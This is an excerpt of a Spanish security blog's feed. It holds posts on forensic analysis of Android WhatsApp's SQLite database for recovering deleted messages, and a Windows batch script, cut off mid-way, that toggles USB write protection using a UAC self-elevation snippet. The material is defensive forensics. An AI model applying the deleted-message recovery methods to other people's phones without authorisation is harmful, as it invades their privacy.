bytes.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;http://3.bp.blogspot.com/-GoENKGS5WiM/Vl7TbLy4iaI/AAAAAAAAdzA/Z0gm0X_hwBg/s1600/Decode_Cell_p3_st2labs.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;640&quot; src=&quot;http://3.bp.blogspot.com/-GoENKGS5WiM/Vl7TbLy4iaI/AAAAAAAAdzA/Z0gm0X_hwBg/s640/Decode_Cell_p3_st2labs.png&quot; width=&quot;372&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;ST2Labs 12 - DFSLite Decode Cell SQLite Data&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;Analizando la información con ayuda de un editor hexadecimal:&lt;br /&gt;&lt;br /&gt;&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;&lt;a href=&quot;http://1.bp.blogspot.com/-gdAZE1qXCuo/Vl7QrGhinVI/AAAAAAAAdy0/T9EEd589TwM/s1600/Cell_data_st2labs.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://1.bp.blogspot.com/-gdAZE1qXCuo/Vl7QrGhinVI/AAAAAAAAdy0/T9EEd589TwM/s1600/Cell_data_st2labs.png&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;font-size: 12.8px;&quot;&gt;ST2Labs 13 - Cell Data to Offset 11358&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Ya tenemos el timestamp del mensaje de WhatsApp, solo hace falta decodificar el valor hexadecimal convertido a decimal para obtener un valor Fecha y Hora.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;Pero esto lo haremos en la ultima parte de mi artículo donde publicaré el código de DFTime que convierte el timestamp de 6 bytes, y comentaré como recuperar mensjes &quot;eliminados&quot; de la base de datos.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;#ST2Labs&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;#GEOSystemSoftware&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;www.st2labs.com | www.seguridadparatodos.es&lt;/div&gt;</description><link>http://www.seguridadparatodos.es/2015/12/digital-forensics-of-android-whatsapp-p2.html</link><author>noreply@blogger.com (Julian J. Gonzalez)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-S1ktBsgfK40/Vl7qsT4jrAI/AAAAAAAAd0U/m0XGeVoHdqg/s72-c/Whatsapp_p2_st2labs.png" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8268567775100190466.post-736199432446234401</guid><pubDate>Thu, 26 Nov 2015 17:00:00 +0000</pubDate><atom:updated>2015-12-02T14:00:39.246+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Android</category><category domain="http://www.blogger.com/atom/ns#">database</category><category domain="http://www.blogger.com/atom/ns#">DFIR</category><category domain="http://www.blogger.com/atom/ns#">dfsqlite</category><category domain="http://www.blogger.com/atom/ns#">Digital</category><category domain="http://www.blogger.com/atom/ns#">Forensics</category><category domain="http://www.blogger.com/atom/ns#">Seguridad de la Información</category><category domain="http://www.blogger.com/atom/ns#">Seguridad Moviles</category><category domain="http://www.blogger.com/atom/ns#">sqlite</category><category domain="http://www.blogger.com/atom/ns#">Whatsapp</category><title>Digital Forensics of Android WhatsApp SQLite Database (Part I)</title><description>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://1.bp.blogspot.com/-RoFCmk86TRA/Vlc_WCyWKBI/AAAAAAAAdw0/DkM_X2iA5sY/s1600/Whatsapp.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;352&quot; src=&quot;http://1.bp.blogspot.com/-RoFCmk86TRA/Vlc_WCyWKBI/AAAAAAAAdw0/DkM_X2iA5sY/s640/Whatsapp.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;Hace poco me he tenido que enfrentar al análisis forense de la aplicación Whatsapp en Android, y la sorpresa es la limitada información que existe al respecto. Whatsapp no tiene una API pública, y no sólo eso, sino que persigue claramente a quién tras aplicar ingeniería inversa publica información al respecto, me estoy refiriendo sobretodo a la información del protocolo interno de la aplicación.&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;Antecedentes&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Independientemente de la información existente, mi reto no era descifrar la base de datos y recuperar los mensajes (sobre esto si se encuentra disponible un amplio abanico de artículos en Internet), sino recuperar mensajes eliminados de la base de datos, tanto si la aplicación ha sido eliminada (desinstalada) como si simplemente se ha eliminado el historial de chat desde el interfaz de la aplicación.&lt;br /&gt;&lt;br /&gt;Por tanto, el trabajo es analizar la estructura interna de una base de datos SQLite, con el objetivo de recuperar la información que ha sido eliminada y que una sentencia SQL no es capaz de mostrar.&lt;br /&gt;&lt;br /&gt;En este punto es donde empieza mi artículo, analizar el formato de SQLite para recuperar información eliminada.&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;Estructura de SQLite&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Lo principal para analizar una base de datos SQLite internamente es conocer su formato interno, para ello lo mejor es consultar la documentación oficial (&lt;a href=&quot;http://www.sqlite.org/fileformat.html#varint_format&quot; target=&quot;_blank&quot;&gt;SQLite Database File Format&lt;/a&gt;) donde se explica como se organiza la información dentro del fichero con extensión .db (SQLite).&lt;br /&gt;&lt;br /&gt;Una base de datos SQLite se organiza internamente en páginas, y dentro de cada página se almacenan los registros (filas), que se llaman celdas, correspondientes a la información de las tablas de la base de datos. Cada página tiene asignada una función dentro de la estructura del esquema de la base de datos (sql_master), es decir, una tabla de la base de datos almacena información en las celdas de una página.&lt;br /&gt;&lt;br /&gt;De forma resumida, se puede representar el funcionamiento interno de una base de datos SQLite tal y como se puede ver en la siguiente imagen:&lt;br /&gt;&lt;br /&gt;&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-hTSTpdBw_dk/Vla7fPDUSLI/AAAAAAAAdwI/s_TRDHWsoJo/s1600/sqlite_format_1_st2labs.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;231&quot; src=&quot;http://2.bp.blogspot.com/-hTSTpdBw_dk/Vla7fPDUSLI/AAAAAAAAdwI/s_TRDHWsoJo/s640/sqlite_format_1_st2labs.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;ST2Labs 1 - SQLite Format Brief&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;Para conocer el esquema de la base de datos, se puede ejecutar una sentencia SQL tal que así:&lt;br /&gt;&lt;br /&gt;&lt;pre class=&quot;default prettyprint prettyprinted&quot; style=&quot;background-color: #eeeeee; border: 0px; color: #393318; font-family: Consolas, Menlo, Monaco, &#39;Lucida Console&#39;, &#39;Liberation Mono&#39;, &#39;DejaVu Sans Mono&#39;, &#39;Bitstream Vera Sans Mono&#39;, &#39;Courier New&#39;, monospace, sans-serif; font-size: 13px; margin-bottom: 1em; max-height: 600px; overflow: auto; padding: 5px; width: auto; word-wrap: normal;&quot;&gt;&lt;code style=&quot;border: 0px; font-family: Consolas, Menlo, Monaco, &#39;Lucida Console&#39;, &#39;Liberation Mono&#39;, &#39;DejaVu Sans Mono&#39;, &#39;Bitstream Vera Sans Mono&#39;, &#39;Courier New&#39;, monospace, sans-serif; margin: 0px; padding: 0px; white-space: inherit;&quot;&gt;&lt;span class=&quot;pln&quot; style=&quot;border: 0px; color: black; margin: 0px; padding: 0px;&quot;&gt;SELECT &lt;/span&gt;&lt;span class=&quot;pun&quot; style=&quot;border: 0px; color: black; margin: 0px; padding: 0px;&quot;&gt;*&lt;/span&gt;&lt;span class=&quot;pln&quot; style=&quot;border: 0px; color: black; margin: 0px; padding: 0px;&quot;&gt; FROM sqlite_master&lt;/span&gt;&lt;span class=&quot;pun&quot; style=&quot;border: 0px; color: black; margin: 0px; padding: 0px;&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;o bien, he creado mi propia herramienta que facilita la consulta de información de una base de datos SQLite, tal que así:&lt;br /&gt;&lt;br /&gt;&lt;pre class=&quot;default prettyprint prettyprinted&quot; style=&quot;background-color: #eeeeee; border: 0px; color: #393318; font-family: Consolas, Menlo, Monaco, &#39;Lucida Console&#39;, &#39;Liberation Mono&#39;, &#39;DejaVu Sans Mono&#39;, &#39;Bitstream Vera Sans Mono&#39;, &#39;Courier New&#39;, monospace, sans-serif; font-size: 13px; margin-bottom: 1em; max-height: 600px; overflow: auto; padding: 5px; width: auto; word-wrap: normal;&quot;&gt;python sqlite_ex.py msgstore.db&lt;/pre&gt;&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-3sF8dF3sHTI/Vlbdc2atPyI/AAAAAAAAdwY/jTnbXZA6cvg/s1600/sqlite_format_2_st2labs.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;400&quot; src=&quot;http://2.bp.blogspot.com/-3sF8dF3sHTI/Vlbdc2atPyI/AAAAAAAAdwY/jTnbXZA6cvg/s640/sqlite_format_2_st2labs.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;ST2Labs 2 - WhatsApp sql_master (db_schema)&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;Además la herramienta permite hacer un &quot;dump&quot; de la base de datos, guardar en un archivo el esquema de la base de datos al completo, o mostrar la información de una tabla en particular, por ejemplo, y siguiendo con el hilo del articulo, vamos a consultar la información sobre la tabla &quot;message&quot; que es donde Whatsapp almacena la información de los mensajes que se intercambian.&lt;br /&gt;&lt;br /&gt;&lt;pre class=&quot;default prettyprint prettyprinted&quot; style=&quot;background-color: #eeeeee; border: 0px; color: #393318; font-family: Consolas, Menlo, Monaco, &#39;Lucida Console&#39;, &#39;Liberation Mono&#39;, &#39;DejaVu Sans Mono&#39;, &#39;Bitstream Vera Sans Mono&#39;, &#39;Courier New&#39;, monospace, sans-serif; font-size: 13px; margin-bottom: 1em; max-height: 600px; overflow: auto; padding: 5px; width: auto; word-wrap: normal;&quot;&gt;python sqlite_ex.py -i messages msgstore.db&lt;/pre&gt;&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-Kqw7J62Sp6Y/VlbepQkrhYI/AAAAAAAAdwk/DYp5mHdgXL0/s1600/sqlite_format_3_st2labs.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;400&quot; src=&quot;http://2.bp.blogspot.com/-Kqw7J62Sp6Y/VlbepQkrhYI/AAAAAAAAdwk/DYp5mHdgXL0/s400/sqlite_format_3_st2labs.png&quot; width=&quot;301&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;ST2Labs 3 - WhatsApp Messages Table Info&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;Volviendo a la imagen 2, se observa que la tabla &quot;messages&quot; de WhatsApp se encuentra almacenada en la página 3 de la base de datos SQLite (msgstore.db) y la imagen 3 nos muestra el &quot;contenido&quot; como será organizado en la celda que se generan dentro de la base de datos en la página 3.&lt;br /&gt;&lt;br /&gt;Volveremos más tarde a esta información, que nos resultará útil más adelante cuando empiece a analizar la estructura interna del fichero msgstore.db para recuperar la información eliminada.&lt;br /&gt;&lt;br /&gt;Pero esto lo dejo para mi siguiente artículo.&lt;br /&gt;&lt;br /&gt;La herramienta que he utilizado en éste artículo la podéis encontrar en mi repositorio oficial (&lt;a href=&quot;https://github.com/ST2Labs/DFIR&quot;&gt;https://github.com/ST2Labs/DFIR&lt;/a&gt;) o descargar la versión para windows directamente a continuación:&lt;br /&gt;&lt;br /&gt;&lt;a href=&quot;http://sqlite_ex.exe/&quot;&gt;sqlite_ex.exe&lt;/a&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;b&gt;sha1:&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;7IR6FALIEDG6EPAIE6LVMTZY2UFQVEOO (sha1 base 32)&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;b&gt;sha-256:&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;6FE6BB8DB06D1A8E17ACD8B79A372821B23260468A92B54EAE229906D32FFACF&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;b&gt;sha-512:&lt;/b&gt;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;9D8A9AC6037F5F75367F31E2516D98613E8633C79536B99A76ACAD56865250A7845C8A411F1AB8213353DE7EB67AE3E429AAE063049E9A44B4E5E95444C3500C&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Referencias:&lt;br /&gt;[1] &lt;a href=&quot;http://www.sqlite.org/fileformat.html#varint_format&quot; target=&quot;_blank&quot;&gt;SQLlite File Format&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;#ST2Labs #GEOSystemSoftware&lt;br /&gt;#DFIR&lt;br /&gt;#Forensics&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;</description><link>http://www.seguridadparatodos.es/2015/11/digital-forensics-of-android-whatsapp.html</link><author>noreply@blogger.com (Julian J. Gonzalez)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-RoFCmk86TRA/Vlc_WCyWKBI/AAAAAAAAdw0/DkM_X2iA5sY/s72-c/Whatsapp.png" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8268567775100190466.post-1143378642019533837</guid><pubDate>Mon, 19 Oct 2015 08:34:00 +0000</pubDate><atom:updated>2015-10-30T10:11:16.416+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">DFIR</category><category domain="http://www.blogger.com/atom/ns#">Digital</category><category domain="http://www.blogger.com/atom/ns#">Forensics</category><category domain="http://www.blogger.com/atom/ns#">ST2Labs</category><category domain="http://www.blogger.com/atom/ns#">USB</category><category domain="http://www.blogger.com/atom/ns#">Windows</category><title>Windows Forensics Tips - USB Write Protected</title><description>&lt;a href=&quot;http://3.bp.blogspot.com/-A2WJPZgNOTA/ViSqHkiT3uI/AAAAAAAAdvs/a5WdJnoqHMk/s1600/Registro.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;178&quot; src=&quot;http://3.bp.blogspot.com/-A2WJPZgNOTA/ViSqHkiT3uI/AAAAAAAAdvs/a5WdJnoqHMk/s640/Registro.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;br /&gt;Hi every one!&lt;br /&gt;&lt;br /&gt;This post I have decided write in english why? Answer is why not? In Digital Forensics it&#39;s so important to mantain integrity of evidence, is for this reason what you need read data without any modification. Sometime you get the &quot;evidence&quot; and write into a USB stick, then if you have to read data into windows device, you must enable write protetection for USB device to avoid any modification of them.&lt;br /&gt;&lt;br /&gt;This is the target of this &quot;post&quot;, I&#39;ve wrote a simple batch script to &quot;enable&quot; and &quot;disable&quot; the USB write protection it as soon as you need. By default windows always allow write into USB device.&lt;br /&gt;&lt;br /&gt;The usage is so easy, is like &quot;stop / start&quot;, &amp;nbsp;before you plug the USB device you must used the script, so on all USB is write protected. And if you used script again, you disable it, so on the next USB device is not write protected.&lt;br /&gt;&lt;br /&gt;Here the script:&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333; font-family: Consolas, Liberation Mono, Menlo, Courier, monospace;&quot;&gt;&lt;span style=&quot;font-size: 12px; line-height: 18.2px; white-space: pre;&quot;&gt;@ECHO OFF &amp;amp;SETLOCAL&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333; font-family: Consolas, Liberation Mono, Menlo, Courier, monospace;&quot;&gt;&lt;span style=&quot;font-size: 12px; line-height: 18.2px; white-space: pre;&quot;&gt;:: ****************&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333; font-family: Consolas, Liberation Mono, Menlo, Courier, monospace;&quot;&gt;&lt;span style=&quot;font-size: 12px; line-height: 18.2px; white-space: pre;&quot;&gt;::&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333; font-family: Consolas, Liberation Mono, Menlo, Courier, monospace;&quot;&gt;&lt;span style=&quot;font-size: 12px; line-height: 18.2px; white-space: pre;&quot;&gt;:: &lt;span class=&quot;Apple-tab-span&quot; style=&quot;white-space: pre;&quot;&gt;   &lt;/span&gt;getUSBProtect v.01&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333; font-family: Consolas, Liberation Mono, Menlo, Courier, monospace;&quot;&gt;&lt;span style=&quot;font-size: 12px; line-height: 18.2px; white-space: pre;&quot;&gt;::&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333; font-family: Consolas, Liberation Mono, Menlo, Courier, monospace;&quot;&gt;&lt;span style=&quot;font-size: 12px; line-height: 18.2px; white-space: pre;&quot;&gt;:: @Fecha:&lt;span class=&quot;Apple-tab-span&quot; style=&quot;white-space: pre;&quot;&gt;  &lt;/span&gt;16/09/2015&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333; font-family: Consolas, Liberation Mono, Menlo, Courier, monospace;&quot;&gt;&lt;span style=&quot;font-size: 12px; line-height: 18.2px; white-space: pre;&quot;&gt;:: @Version:&lt;span class=&quot;Apple-tab-span&quot; style=&quot;white-space: pre;&quot;&gt; &lt;/span&gt;0.1&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333; font-family: Consolas, Liberation Mono, Menlo, Courier, monospace;&quot;&gt;&lt;span style=&quot;font-size: 12px; line-height: 18.2px; white-space: pre;&quot;&gt;:: @Autor: &lt;span class=&quot;Apple-tab-span&quot; style=&quot;white-space: pre;&quot;&gt;  &lt;/span&gt;Julian J. Gonzalez&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333; font-family: Consolas, Liberation Mono, Menlo, Courier, monospace;&quot;&gt;&lt;span style=&quot;font-size: 12px; line-height: 18.2px; white-space: pre;&quot;&gt;:: @Dept:&lt;span class=&quot;Apple-tab-span&quot; style=&quot;white-space: pre;&quot;&gt;  &lt;/span&gt;ST2Labs - www.seguridadparatodos.es&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333; font-family: Consolas, Liberation Mono, Menlo, Courier, monospace;&quot;&gt;&lt;span style=&quot;font-size: 12px; line-height: 18.2px; white-space: pre;&quot;&gt;::&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333; font-family: Consolas, Liberation Mono, Menlo, Courier, monospace;&quot;&gt;&lt;span style=&quot;font-size: 12px; line-height: 18.2px; white-space: pre;&quot;&gt;:: ****************&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333; font-family: Consolas, Liberation Mono, Menlo, Courier, monospace;&quot;&gt;&lt;span style=&quot;font-size: 12px; line-height: 18.2px; white-space: pre;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: #333333; font-family: Consolas, Liberation Mono, Menlo, Courier, monospace;&quot;&gt;&lt;span style=&quot;font-size: 12px; line-height: 18.2px; white-space: pre;&quot;&gt;SET key=&quot;HKLM\System\CurrentControlSet\Control\StorageDevicePolicies&quot;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333; font-family: Consolas, Liberation Mono, Menlo, Courier, monospace;&quot;&gt;&lt;span style=&quot;font-size: 12px; line-height: 18.2px; white-space: pre;&quot;&gt;SET value=WriteProtect&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333; font-family: Consolas, Liberation Mono, Menlo, Courier, monospace;&quot;&gt;&lt;span style=&quot;font-size: 12px; line-height: 18.2px; white-space: pre;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: #333333; font-family: Consolas, Liberation Mono, Menlo, Courier, monospace;&quot;&gt;&lt;span style=&quot;font-size: 12px; line-height: 18.2px; white-space: pre;&quot;&gt;:: BatchGotAdmin&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333; font-family: Consolas, Liberation Mono, Menlo, Courier, monospace;&quot;&gt;&lt;span style=&quot;font-size: 12px; line-height: 18.2px; white-space: pre;&quot;&gt;:-------------------------------------&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333; font-family: Consolas, Liberation Mono, Menlo, Courier, monospace;&quot;&gt;&lt;span style=&quot;font-size: 12px; line-height: 18.2px; white-space: pre;&quot;&gt;REM &amp;nbsp;--&amp;gt; Check for permissions&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333; font-family: Consolas, Liberation Mono, Menlo, Courier, monospace;&quot;&gt;&lt;span style=&quot;font-size: 12px; line-height: 18.2px; white-space: pre;&quot;&gt;&amp;gt;nul 2&amp;gt;&amp;amp;1 &quot;%SYSTEMROOT%\system32\cacls.exe&quot; &quot;%SYSTEMROOT%\system32\config\system&quot;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333; font-family: Consolas, Liberation Mono, Menlo, Courier, monospace;&quot;&gt;&lt;span style=&quot;font-size: 12px; line-height: 18.2px; white-space: pre;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: #333333; font-family: Consolas, Liberation Mono, Menlo, Courier, monospace;&quot;&gt;&lt;span style=&quot;font-size: 12px; line-height: 18.2px; white-space: pre;&quot;&gt;REM --&amp;gt; If error flag set, we do not have admin.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333; font-family: Consolas, Liberation Mono, Menlo, Courier, monospace;&quot;&gt;&lt;span style=&quot;font-size: 12px; line-height: 18.2px; white-space: pre;&quot;&gt;if &#39;%errorlevel%&#39; NEQ &#39;0&#39; (&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333; font-family: Consolas, Liberation Mono, Menlo, Courier, monospace;&quot;&gt;&lt;span style=&quot;font-size: 12px; line-height: 18.2px; white-space: pre;&quot;&gt;&amp;nbsp; &amp;nbsp; echo Requesting administrative privileges...&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333; font-family: Consolas, Liberation Mono, Menlo, Courier, monospace;&quot;&gt;&lt;span style=&quot;font-size: 12px; line-height: 18.2px; white-space: pre;&quot;&gt;&amp;nbsp; &amp;nbsp; goto UACPrompt&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333; font-family: Consolas, Liberation Mono, Menlo, Courier, monospace;&quot;&gt;&lt;span style=&quot;font-size: 12px; line-height: 18.2px; white-space: pre;&quot;&gt;) else ( goto gotAdmin )&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333; font-family: Consolas, Liberation Mono, Menlo, Courier, monospace;&quot;&gt;&lt;span style=&quot;font-size: 12px; line-height: 18.2px; white-space: pre;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: #333333; font-family: Consolas, Liberation Mono, Menlo, Courier, monospace;&quot;&gt;&lt;span style=&quot;font-size: 12px; line-height: 18.2px; white-space: pre;&quot;&gt;:UACPrompt&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333; font-family: Consolas, Liberation Mono, Menlo, Courier, monospace;&quot;&gt;&lt;span style=&quot;font-size: 12px; line-height: 18.2px; white-space: pre;&quot;&gt;&amp;nbsp; &amp;nbsp; echo Set UAC = CreateObject^(&quot;Shell.Application&quot;^) &amp;gt; &quot;%temp%\getadmin.vbs&quot;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333; font-family: Consolas, Liberation Mono, Menlo, Courier, monospace;&quot;&gt;&lt;span style=&quot;font-size: 12px; line-height: 18.2px; white-space: pre;&quot;&gt;&amp;nbsp; &amp;nbsp; echo UAC.ShellExecute &quot;%~s0&quot;, &quot;&quot;, &quot;&quot;, &quot;runas&quot;, 1 &amp;gt;&amp;gt; &quot;%temp%\getadmin.vbs&quot;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333; font-family: Consolas, Liberation Mono, Menlo, Courier, monospace;&quot;&gt;&lt;span style=&quot;font-size: 12px; line-height: 18.2px; white-space: pre;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: #333333; font-family: Consolas, Liberation Mono, Menlo, Courier, monospace;&quot;&gt;&lt;span style=&quot;font-size: 12px; line-height: 18.2px; white-space: pre;&quot;&gt;&amp;nbsp; &amp;nbsp; &quot;%temp%\getadmin.vbs&quot;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333; font-family: Consolas, Liberation Mono, Menlo, Courier, monospace;&quot;&gt;&lt;span style=&quot;font-size: 12px; line-height: 18.2px; white-space: pre;&quot;&gt;&amp;nbsp; &amp;nbsp; exit /B&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333; font-family: Consolas, Liberation Mono, Menlo, Courier, monospace;&quot;&gt;&lt;span style=&quot;font-size: 12px; line-height: 18.2px; white-space: pre;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;color: #333333; font-family: Consolas, Liberation Mono, Menlo, Courier, monospace;&quot;&gt;&lt;span style=&quot;font-size: 12px; line-height: 18.2px; white-space: pre;&quot;&gt;:gotAdmin&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333; font-family: Consolas, Liberation Mono, Menlo, Courier, monospace;&quot;&gt;&lt;span style=&quot;font-size: 12px; line-height: 18.2px; white-space: 